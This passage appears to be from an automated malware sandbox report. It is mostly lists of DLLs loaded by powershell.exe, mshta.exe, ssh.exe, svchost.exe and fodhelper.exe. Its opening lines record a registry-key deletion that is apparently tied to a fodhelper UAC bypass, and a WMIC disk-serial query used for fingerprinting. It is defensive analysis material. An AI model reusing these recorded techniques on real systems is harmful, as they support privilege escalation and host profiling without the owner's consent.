          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG DELETE HKEY_CURRENT_USER\Software\Classes\ServiceHostXGRT /F
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\fodhelper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
